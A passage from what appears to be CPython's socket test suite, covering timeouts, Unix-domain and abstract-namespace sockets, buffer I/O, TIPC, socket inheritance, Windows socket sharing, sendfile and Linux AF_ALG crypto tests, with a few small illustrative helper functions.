SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
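# A minimal sketch (not part of the test suite, Linux-only): abstract-namespace
# addresses start with a NUL byte and never create a filesystem entry, which
# is what TestLinuxAbstractNamespace checks. The helper name and address are
# illustrative only.
def _example_abstract_namespace_bind():
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(b"\x00python-example-socket")    # no file is created for this name
    return s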
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory, or if we
        # do not have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # Socket sharing is expected to work only for blocking sockets,
        # since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, Windows will have picked the
        # correct value internally.  Python introspection on the socket will
        # still return 0, however.  For the shared socket, the Python value is
        # recreated from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
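# A minimal sketch (not part of the test suite, Windows-only) of the
# share()/fromshare() round trip used by TestSocketSharing: the parent
# serialises the socket for a specific pid and the child rebuilds it. How the
# bytes blob is transferred (a multiprocessing queue in testShare above) is up
# to the caller; the helper names are hypothetical.
def _example_share_socket(serv, target_pid):
    return serv.share(target_pid)       # bytes blob usable only by target_pid
def _example_rebuild_shared_socket(data):
    return socket.fromshare(data)       # recreate the socket in the child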
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
    # sendfile() is not supposed to work on non-blocking sockets
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
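# A minimal sketch (not part of the test suite) of the public API the two
# classes above exercise: socket.sendfile() uses os.sendfile() where the
# platform supports it and otherwise falls back to plain send(). The helper
# name is hypothetical and is never called by the tests.
def _example_sendfile(address, path):
    with socket.create_connection(address) as sock, open(path, 'rb') as f:
        return sock.sendfile(f)         # total number of bytes sent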
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
    # bpo-31705: On kernels older than 4.5, sendto() failed with ENOKEY,
    # at least on the ppc64le architecture.
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
    # Although it should work with kernel 3.19 and newer, the test blocks
    # on Ubuntu 15.10 with kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
